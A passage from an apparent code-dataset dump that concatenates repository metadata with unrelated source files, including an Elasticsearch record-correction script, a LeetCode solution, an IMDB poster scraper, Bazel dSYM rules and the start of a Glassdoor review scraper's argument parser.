] | null | null | null | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
] | 1 | 2017-06-17T19:25:51.000Z | 2017-06-19T15:33:22.000Z | gracc-oneoffs/remove-odd-procs/remove-odd-procs.py | opensciencegrid/gracc-tools | 86297d0a8b6b208b6c661473647fdc69f438afec | [
"Apache-2.0"
] | 2 | 2017-06-16T20:07:38.000Z | 2017-06-17T15:03:18.000Z | #!/usr/bin/python
import elasticsearch
from elasticsearch_dsl import Search, A, Q
#import logging
import sys
import os
#logging.basicConfig(level=logging.WARN)
#es = elasticsearch.Elasticsearch(
# ['https://gracc.opensciencegrid.org/q'],
# timeout=300, use_ssl=True, verify_certs=False)
es = elasticsearch.Elasticsearch(
['localhost:9200'],
timeout=300)
osg_raw_index = 'gracc.osg.raw-*'
s = Search(using=es, index=osg_raw_index)
# Match the records by ProbeName and processors = 0.
s = s.query("match", ProbeName="htcondor-ce:hosted-ce18.grid.uchicago.edu")
s = s.query("match", Processors=0)
s = s.filter('range', EndTime={'from': 'now-12M', 'to': 'now'})
response = s.execute()
print "Query took %i milliseconds" % response.took
print "Query got %i hits" % response.hits.total
#update_id = "8c5816978fee6fc17718bcf81350d1f4"
#print "About to update record with id: %s" % update_id
#es.update(index="gracc.osg.raw3-2017.07", doc_type='JobUsageRecord', id=update_id, body={'doc': {'VOName': 'UserSchool2017'}})
update_buffer = []
for hit in s.scan():
# Calculate the new CoreHours (cores = 1):
core_hours = hit.WallDuration / 3600.0
updated_doc = {
"doc": {
"CoreHours": core_hours,
"Processors": 1
},
"_index": hit.meta.index,
"_id": hit.meta.id,
"_type": hit.meta.doc_type,
"_op_type": "update"
}
update_buffer.append(updated_doc)
print "Update %s" % updated_doc
if len(update_buffer) > 200:
elasticsearch.helpers.bulk(es, update_buffer)
update_buffer = []
elasticsearch.helpers.bulk(es, update_buffer)
#es.update(index=hit.meta.index, doc_type=hit.meta.doc_type, id=hit.meta.id, body={'doc': updated_doc})
| 30.568966 | 128 | 0.667795 | 237 | 1,773 | 4.864979 | 0.443038 | 0.062446 | 0.048569 | 0.02255 | 0.097138 | 0.065915 | 0 | 0 | 0 | 0 | 0 | 0.039972 | 0.181613 | 1,773 | 57 | 129 | 31.105263 | 0.754652 | 0.35251 | 0 | 0.117647 | 0 | 0 | 0.178697 | 0.036092 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df2507bcc55adf702b1c6993e0b76f7f643ef8d6 | 849 | py | Python | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | 1 | 2020-11-24T07:48:55.000Z | 2020-11-24T07:48:55.000Z | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | null | null | null | Hasoc/create_folds.py | tezike/Hasoc | b29c5ec877a1751b04f86227a6ad264be8c06d81 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/create_folds.ipynb (unless otherwise specified).
__all__ = ['df', 'df', 'y', 'kf', 'df', 'y']
# Cell
import os
import pandas as pd
from sklearn.model_selection import StratifiedKFold
# Cell
df = pd.read_csv(os.path.join('../data', 'en_task_a', 'hasoc_2020_en_train_new.csv'), sep='\t')
# Cell
df['kfold_task1'] = -1
df['kfold_task2'] = -1
df = df.sample(frac=1.,random_state=SEED).reset_index(drop=True)
y = df['task1'].values
kf = StratifiedKFold(n_splits=5)
for fold,(t_,v_) in enumerate(kf.split(X=df,y=y)):
df.loc[v_,'kfold_task1'] = fold
df = df.sample(frac=1.,random_state=SEED).reset_index(drop=True)
y = df['task2'].values
for fold,(t_,v_) in enumerate(kf.split(X=df,y=y)):
df.loc[v_,'kfold_task2'] = fold
# Cell
df.to_csv(os.path.join('..', 'data', 'fold_df.csv'), index=False) | 29.275862 | 96 | 0.684335 | 149 | 849 | 3.697987 | 0.456376 | 0.021779 | 0.032668 | 0.047187 | 0.402904 | 0.341198 | 0.341198 | 0.341198 | 0.341198 | 0.341198 | 0 | 0.019947 | 0.114252 | 849 | 29 | 97 | 29.275862 | 0.712766 | 0.134276 | 0 | 0.235294 | 1 | 0 | 0.172603 | 0.036986 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df2f4471a03807c5058e593384972868df67d33c | 709 | py | Python | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | taller_estructuras_de_control/codigo_python_ejercicios/ejercicio_9.py | JMosqueraM/algoritmos_y_programacion | 30dc179b976f1db24401b110496250fbcb98938e | [
"MIT"
] | null | null | null | #Calcular el salario neto de un tnrabajador en fucion del numero de horas trabajadas, el precio de la hora
#y el descuento fijo al sueldo base por concepto de impuestos del 20%
horas = float(input("Ingrese el numero de horas trabajadas: "))
precio_hora = float(input("Ingrese el precio por hora trabajada: "))
sueldo_base = float(input("Ingrese el valor del sueldo base: "))
pago_hora = horas * precio_hora
impuesto = 0.2
salario_neto = pago_hora + (sueldo_base * 0.8)
print(f"Si el trabajador tiene un sueldo base de {sueldo_base}$ (al cual se le descuenta un 20% por impuestos), trabaja {horas} horas, y la hora se le paga a {precio_hora}$.")
print(f"El salario neto del trabajador es de {salario_neto}$") | 59.083333 | 175 | 0.753173 | 121 | 709 | 4.330579 | 0.404959 | 0.114504 | 0.097328 | 0.108779 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0134 | 0.157969 | 709 | 12 | 176 | 59.083333 | 0.864322 | 0.244006 | 0 | 0 | 0 | 0.125 | 0.613084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df321ec897b131393422f40ec400fe5025edb45a | 3,189 | py | Python | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2021-07-05T01:53:30.000Z | 2021-07-05T01:53:30.000Z | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | null | null | null | cs15211/BattleshipsInABoard.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2018-01-08T07:14:08.000Z | 2018-01-08T07:14:08.000Z | __source__ = 'https://github.com/kamyu104/LeetCode/blob/master/Python/battleships-in-a-board.py'
# Time: O(m * n)
# Space: O(1)
#
#
# Description: 419. Battleships in a Board
#
# Given an 2D board, count how many different battleships are in it.
# The battleships are represented with 'X's, empty slots are represented with '.'s.
# You may assume the following rules:
#
# You receive a valid board, made of only battleships or empty slots.
# Battleships can only be placed horizontally or vertically. In other words,
# they can only be made of the shape 1xN (1 row, N columns) or Nx1 (N rows, 1 column),
# where N can be of any size.
# At least one horizontal or vertical cell separates between two battleships -
# there are no adjacent battleships.
#
# Example:
# X..X
# ...X
# ...X
# In the above board there are 2 battleships.
# Invalid Example:
# ...X
# XXXX
# ...X
# This is not a valid board - as battleships will always have a cell separating between them.
# Your algorithm should not modify the value of the board.
# Follow up:
# Could you do it in one-pass, using only O(1) extra memory and without modifying the value of the board?
#
# Hide Company Tags Microsoft
import unittest
# 32ms 94.99%
class Solution(object):
def countBattleships(self, board):
"""
:type board: List[List[str]]
:rtype: int
"""
if not board or not board[0]:
return 0
cnt = 0
for i in xrange(len(board)):
for j in xrange(len(board[0])):
cnt += int(board[i][j] == 'X' and \
(i == 0 or board[i - 1][j] != 'X') and \
(j == 0 or board[i][j - 1] != 'X'))
return cnt
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
#Thought:
Going over all cells, we can count only those that are the "first" cell of the battleship.
First cell will be defined as the most top-left cell. We can check for first cells by only counting cells
that do not have an 'X' to the left and do not have an 'X' above them.
#2ms 100%
class Solution {
public int countBattleships(char[][] board) {
if (board == null || board.length == 0) return 0;
int m = board.length, n = board[0].length;
int count = 0;
for (int i = 0; i < m ;i++) {
for (int j = 0; j < n; j++) {
if (board[i][j] == '.') continue;
if (i > 0 && board[i-1][j] == 'X') continue;
if (j > 0 && board[i][j-1] == 'X') continue;
count++;
}
}
return count;
}
public int countBattleships2(char[][] board) {
if (board == null || board.length == 0 || board[0].length == 0) return 0;
int R = board.length, C = board[0].length, cnt = 0;
for (int i = 0; i < R; i++) {
for (int j = 0; j < C; j++) {
if (board[i][j] == 'X'
&& (i == 0 || board[i - 1][j] == '.')
&& (j == 0 || board[i][j - 1] == '.'))
cnt++;
}
}
return cnt;
}
}
''' | 31.574257 | 105 | 0.558169 | 466 | 3,189 | 3.791845 | 0.373391 | 0.03056 | 0.023769 | 0.013582 | 0.153367 | 0.081494 | 0.03622 | 0.03622 | 0 | 0 | 0 | 0.025792 | 0.306993 | 3,189 | 101 | 106 | 31.574257 | 0.773756 | 0.334588 | 0 | 0 | 0 | 0.092593 | 0.690141 | 0.024769 | 0 | 0 | 0 | 0 | 0.018519 | 1 | 0.037037 | false | 0 | 0.018519 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df3715d9a9064f79f11dad87ba56f6a3d27743a1 | 289 | py | Python | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | tests/test_wrong_url.py | alexella1/python-ascii_magic | df189da5dc59d4cd6f6fe003a75c99539247851f | [
"MIT"
] | null | null | null | from context import ascii_magic
try:
output = ascii_magic.from_url('https://wow.zamimg.com/uploads/blog/images/20516-afterlives-ardenweald-4k-desktop-wallpapers.jpg')
ascii_magic.to_terminal(output)
except OSError as e:
print(f'Could not load the image, server said: {e.code} {e.msg}') | 41.285714 | 130 | 0.782007 | 47 | 289 | 4.702128 | 0.829787 | 0.135747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0.086505 | 289 | 7 | 131 | 41.285714 | 0.814394 | 0 | 0 | 0 | 0 | 0.166667 | 0.52069 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df38488be49b126da2ba8c4b38d9a97d5b60ae28 | 2,706 | py | Python | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | book/code/imdb - project4+5 scrape popular film list and poster.py | marcus-pham/test | bcbc7c34a672ae6c7e9bdc811934c4003134ae0d | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from selenium import webdriver
import requests
import time
class Film(object):
"""docstring for film"""
def __init__(self):
self.title = ""
self.rank = ""
self.year_of_production = ""
self.link = ""
def create_phantom_driver():
driver = webdriver.PhantomJS(executable_path = r'C:\phantomjs-2.1.1-windows\bin\phantomjs.exe')
return driver
def get_popular_film_list(url):
driver = create_phantom_driver()
# url = 'http://www.imdb.com/chart/top?ref_=nv_mv_250_6'
# download html
driver.get(url)
# print driver.page_source
# create soup
soup = BeautifulSoup(driver.page_source,'lxml')
# soup = BeautifulSoup(open('imdb.html'),'lxml')
# search
table = soup.find('table',class_='chart')
film_list =[]
for td in table.find_all('td',class_='titleColumn'):
a = td.find('a')
# print a['href']
new_film = Film()
full_des = td.text.strip().replace('\n','')
# print full_des
title = full_des.split('(')[0]
# print title
year = full_des.split('(')[1][:4]
# print year
start_rank = full_des.find(')')
end_rank = full_des.find('(',start_rank,len(full_des))
rank = full_des[start_rank+1:end_rank]
# print rank
new_film.rank = rank
new_film.title = title
new_film.year_of_production = year
new_film.link = a['href'].strip()
film_list.append(new_film)
driver.quit()
for film in film_list:
print film.title
print film.rank
print film.year_of_production
print film.link
print "\n"
return film_list
# when ever we have the film list
def poster_scrap(film_list):
driver = create_phantom_driver()
for film in film_list:
url = 'http://www.imdb.com' + film.link
print film.title
driver.get(url)
soup = BeautifulSoup(driver.page_source, 'lxml')
div = soup.find('div', class_='poster')
# find the link lead to poster image
a = div.find('a')
# link to download poster image
poster_url = 'http://www.imdb.com' + a['href']
print poster_url
driver.get(poster_url)
soup = BeautifulSoup(driver.page_source, 'lxml')
# print soup.prettify()
divs = soup.find_all('div',class_='pswp__zoom-wrap')
try:
imgs = divs[1].find_all('img')
download_link = imgs[1]['src']
print download_link
except Exception, e:
imgs = divs[0].find_all('img')
download_link = imgs[1]['src']
print download_link
f = open('{0}.jpg'.format(film.title.encode('utf8').replace(':','')),'wb')
f.write(requests.get(download_link).content)
# time.sleep(2)
f.close()
driver.quit()
# url for current popular and hot film
url = 'http://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm_7'
# get_popular_film_list(url)
poster_scrap(get_popular_film_list(url))
| 20.5 | 96 | 0.682927 | 409 | 2,706 | 4.315403 | 0.298289 | 0.045326 | 0.024929 | 0.031728 | 0.218697 | 0.144476 | 0.098584 | 0.053258 | 0.053258 | 0.053258 | 0 | 0.008873 | 0.167036 | 2,706 | 131 | 97 | 20.656489 | 0.774179 | 0.15558 | 0 | 0.246377 | 0 | 0 | 0.107939 | 0.019625 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.057971 | null | null | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df4060697a7eb303c5884fc6599a1897ddcbd97e | 4,264 | bzl | Python | apple/bundling/debug_symbol_actions.bzl | kastiglione/rules_apple | 3745c3f03b9d29a04671fd4fac96468ca7031fd6 | [
"Apache-2.0"
] | 2 | 2019-09-01T06:06:40.000Z | 2020-11-10T00:37:01.000Z | apple/bundling/debug_symbol_actions.bzl | c-parsons/rules_apple | f75c4b1be219cb32704d900bd1a42ab200eab445 | [
"Apache-2.0"
] | null | null | null | apple/bundling/debug_symbol_actions.bzl | c-parsons/rules_apple | f75c4b1be219cb32704d900bd1a42ab200eab445 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Actions to manipulate debug symbol outputs."""
load("@build_bazel_rules_apple//apple/bundling:file_actions.bzl", "file_actions")
def _collect_linkmaps(ctx, debug_outputs, bundle_name):
"""Collects the available linkmaps from the binary.
Args:
ctx: The current context.
debug_outputs: dSYM bundle binary provider.
bundle_name: Anticipated name of the dSYM bundle.
Returns:
A list of linkmap files, one per linked architecture.
"""
outputs = []
actions = ctx.actions
# TODO(b/36174487): Iterate over .items() once the Map/dict problem is fixed.
for arch in debug_outputs.outputs_map:
arch_outputs = debug_outputs.outputs_map[arch]
linkmap = arch_outputs["linkmap"]
out_linkmap = actions.declare_file("%s_%s.linkmap" % (bundle_name, arch))
outputs.append(out_linkmap)
file_actions.symlink(ctx, linkmap, out_linkmap)
return outputs
def _create_symbol_bundle(ctx, debug_outputs, bundle_name, bundle_extension = ""):
"""Creates the .dSYM bundle next to the output archive.
The generated bundle will have the same name as the bundle being built
(including its extension), but with the ".dSYM" extension appended to it.
If the target being built does not have a binary or if the build it not
generating debug symbols (`--apple_generate_dsym` is not provided), then this
function is a no-op that returns an empty list.
This function assumes that the target has a user-provided binary in the
`binary` attribute. It is the responsibility of the caller to check this.
Args:
ctx: The Skylark context.
debug_outputs: dSYM bundle binary provider.
bundle_name: Anticipated name of the dSYM bundle.
bundle_extension: Anticipated extension of the dSYM bundle, empty string if
it does not have one.
Returns:
A list of files that comprise the .dSYM bundle, which should be returned as
additional outputs from the rule.
"""
dsym_bundle_name = bundle_name + bundle_extension + ".dSYM"
outputs = []
actions = ctx.actions
# TODO(b/36174487): Iterate over .items() once the Map/dict problem is fixed.
for arch in debug_outputs.outputs_map:
arch_outputs = debug_outputs.outputs_map[arch]
dsym_binary = arch_outputs["dsym_binary"]
out_symbols = actions.declare_file("%s/Contents/Resources/DWARF/%s_%s" % (
dsym_bundle_name,
bundle_name,
arch,
))
outputs.append(out_symbols)
file_actions.symlink(ctx, dsym_binary, out_symbols)
# If we found any outputs, create the Info.plist for the bundle as well;
# otherwise, we just return the empty list. The plist generated by dsymutil
# only varies based on the bundle name, so we regenerate it here rather than
# propagate the other one from the apple_binary. (See
# https://github.com/llvm-mirror/llvm/blob/master/tools/dsymutil/dsymutil.cpp)
if outputs:
out_plist = actions.declare_file("%s/Contents/Info.plist" %
dsym_bundle_name)
outputs.append(out_plist)
actions.expand_template(
template = ctx.file._dsym_info_plist_template,
output = out_plist,
substitutions = {
"%bundle_name_with_extension%": bundle_name + bundle_extension,
},
)
return outputs
# Define the loadable module that lists the exported symbols in this file.
debug_symbol_actions = struct(
collect_linkmaps = _collect_linkmaps,
create_symbol_bundle = _create_symbol_bundle,
)
| 39.481481 | 82 | 0.695826 | 579 | 4,264 | 4.979275 | 0.352332 | 0.045092 | 0.022546 | 0.030524 | 0.231009 | 0.181755 | 0.160943 | 0.160943 | 0.160943 | 0.160943 | 0 | 0.007324 | 0.231473 | 4,264 | 107 | 83 | 39.850467 | 0.872444 | 0.554409 | 0 | 0.243902 | 0 | 0 | 0.106455 | 0.079275 | 0 | 0 | 0 | 0.018692 | 0 | 1 | 0.04878 | false | 0 | 0 | 0 | 0.097561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df4381be0a6af61c9a8d19296067917654a1c8b3 | 3,958 | py | Python | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | ipyannotator/ipytyping/annotations.py | itepifanio/ipyannotator | eac99f71d8d39e02a10c21807508b0c064077806 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/00c_annotation_types.ipynb (unless otherwise specified).
__all__ = []
# Internal Cell
from pathlib import Path
from collections.abc import MutableMapping
from typing import Dict, Optional, Iterable, Any, Union
from ipywidgets import Layout
from ..mltypes import OutputImageLabel, OutputLabel
from ..custom_input.buttons import ImageButton, ImageButtonSetting, ActionButton
# Internal Cell
class AnnotationStore(MutableMapping):
def __init__(self, annotations: Optional[Dict] = None):
self._annotations = annotations or {}
def __getitem__(self, key: str):
return self._annotations[key]
def __delitem__(self, key: str):
if key in self:
del self._annotations[key]
def __setitem__(self, key: str, value: Any):
self._annotations[key] = value
def __iter__(self):
return iter(self._annotations)
def __len__(self):
return len(self._annotations)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, self._annotations)
# Internal Cell
class LabelStore(AnnotationStore):
def __getitem__(self, key: str):
assert isinstance(key, str)
return self._annotations[key]
def __delitem__(self, key: str):
assert isinstance(key, str)
if key in self:
del self._annotations[key]
def __setitem__(self, key: str, value: Optional[Dict[str, bool]]):
assert isinstance(key, str)
if value:
assert isinstance(value, dict)
self._annotations[key] = value
# Internal Cell
def _label_store_to_image_button(
annotation: LabelStore,
width: int = 150,
height: int = 150,
disabled: bool = False
) -> Iterable[ImageButton]:
button_setting = ImageButtonSetting(
display_label=False,
image_width=f'{width}px',
image_height=f'{height}px'
)
buttons = []
for path, value in annotation.items():
image_button = ImageButton(button_setting)
image_button.image_path = str(path)
image_button.label_value = Path(path).stem
image_button.active = value.get('answer', False)
image_button.disabled = disabled
buttons.append(image_button)
return buttons
# Internal Cell
def _label_store_to_button(
annotation: LabelStore,
disabled: bool
) -> Iterable[ActionButton]:
layout = {
'width': 'auto',
'height': 'auto'
}
buttons = []
for label, value in annotation.items():
button = ActionButton(layout=Layout(**layout))
button.description = label
button.value = label
button.tooltip = label
button.disabled = disabled
if value.get('answer', True):
button.layout.border = 'solid 2px #f7f01e'
buttons.append(button)
return buttons
# Internal Cell
class LabelStoreCaster: # pylint: disable=too-few-public-methods
"""Factory that casts the correctly widget
accordingly with the input"""
def __init__(
self,
output: Union[OutputImageLabel, OutputLabel],
width: int = 150,
height: int = 150,
widgets_disabled: bool = False
):
self.width = width
self.height = height
self.output = output
self.widgets_disabled = widgets_disabled
def __call__(self, annotation: LabelStore) -> Iterable:
if isinstance(self.output, OutputImageLabel):
return _label_store_to_image_button(
annotation,
self.width,
self.height,
self.widgets_disabled
)
if isinstance(self.output, OutputLabel):
return _label_store_to_button(
annotation,
disabled=self.widgets_disabled
)
raise ValueError(
f"output should have type OutputImageLabel or OutputLabel. {type(self.output)} given"
) | 29.102941 | 104 | 0.641991 | 427 | 3,958 | 5.69555 | 0.285714 | 0.067845 | 0.024671 | 0.034539 | 0.229441 | 0.171053 | 0.10773 | 0.090461 | 0.090461 | 0.090461 | 0 | 0.0062 | 0.266549 | 3,958 | 136 | 105 | 29.102941 | 0.831554 | 0.074027 | 0 | 0.262136 | 1 | 0 | 0.043025 | 0 | 0 | 0 | 0 | 0 | 0.038835 | 1 | 0.135922 | false | 0 | 0.058252 | 0.038835 | 0.31068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df53e4881da04ab4f402645f9a8a2b4862a0381d | 1,049 | py | Python | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | null | null | null | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | null | null | null | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | 1 | 2021-05-17T13:01:26.000Z | 2021-05-17T13:01:26.000Z | """FlowMeter URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path
import flow
from . import views
urlpatterns = [
path('', views.flow_view),
path('select/', views.select_device),
path('sniff/', views.sniff),
path('get_flow/', views.get_flow),
path('address/', views.address_analyze),
path('name/', views.name_analyze),
path('burst/', views.burst_analyze)
]
| 32.78125 | 77 | 0.701621 | 154 | 1,049 | 4.714286 | 0.383117 | 0.082645 | 0.020661 | 0.033058 | 0.161157 | 0.161157 | 0.103306 | 0 | 0 | 0 | 0 | 0.009174 | 0.168732 | 1,049 | 31 | 78 | 33.83871 | 0.823395 | 0.595806 | 0 | 0 | 0 | 0 | 0.098321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
df58cc87adff05d56c9092da2fe099ff0776f22b | 6,033 | py | Python | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 2 | 2021-05-27T12:43:20.000Z | 2022-02-24T07:01:55.000Z | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 5 | 2021-03-19T08:52:22.000Z | 2021-09-22T19:21:44.000Z | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 2 | 2020-09-29T03:27:38.000Z | 2020-11-07T05:41:10.000Z | # import libraries
import time
import datetime
from argparse import ArgumentParser
from datetime import date
import re
import json
import numpy as np
import pandas as pd
import django
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from GlassdoorScraper import GlassdoorScraper
from set_django_db import set_django_db
# parameters/arguments
parser = ArgumentParser()
parser.add_argument(
'--chrome_driver_path',
default='/mnt/c/Data/UCL/@MSC Project - Data and sources/chromedriver.exe',
help='An absolute path to the ChromeDriver.'
)
parser.add_argument(
'--headless',
action='store_true',
help='If --headless is passed in, the `headless` browsing is used.'
)
parser.add_argument(
'--email',
help='Email used for log in to the Glassdoor account.'
)
parser.add_argument(
'-p', '--password',
help='Password used for log in to the Glassdoor account.'
)
parser.add_argument(
'-c', '--credentials',
default='/mnt/c/Data/UCL/@MSc Project - Data and sources/credentials.json',
help='Path to credential file containing email and password\
used for log in to the Glassdoor account.'
)
parser.add_argument(
'--companies',
help="An absolute path to the list of companies (txt file)."
)
parser.add_argument(
'-u', '--url',
help='An absolute path to the list of URL address (txt file)\
to the landing page of reviews for a given company.'
)
parser.add_argument(
'--location',
default='London',
help="A location we are interested in.\
Default='London'"
)
parser.add_argument(
'--max_review_age',
help='An indication how old reviews are to be scraped.\
Define if min_date is not provided.'
)
parser.add_argument(
'--min_date',
help="An indication up to which date reviews are to be scraped.\
format='yyyy-mm-dd'\
Define iff max_review_age is not provided."
)
parser.add_argument(
'--mysite_path',
default='/mnt/c/Data/UCL/@MSc Project/DB/mysite/',
help='An absolute path to the django application containing models for the DB.\
This is required iff output_path is not passed in.'
)
parser.add_argument(
'--output_path',
help='An absolute path of the output csv/xlsx file storing the scraped data.\
This is required iff mysite_path is not passed in.'
)
parser.add_argument(
'-l', '--limit',
help='A number of pages to be scraped.\
This is an ideal option for testing, otherwise no limit is passed.'
)
args = parser.parse_args()
# some value assignments and sanity checks
## credentials
if args.credentials:
try:
with open(args.credentials) as f:
credentials = json.loads(f.read())
args.email = credentials['email']
args.password = credentials['password']
except FileNotFoundError:
raise Exception('The filepath given does not exist.')
else:
try:
args.email, args.password = args.email, args.password # a simple way how to verify whether email and password were passed in
except ValueError:
raise Exception('Neiter filepath to the credentials, nor email and password are specified.\
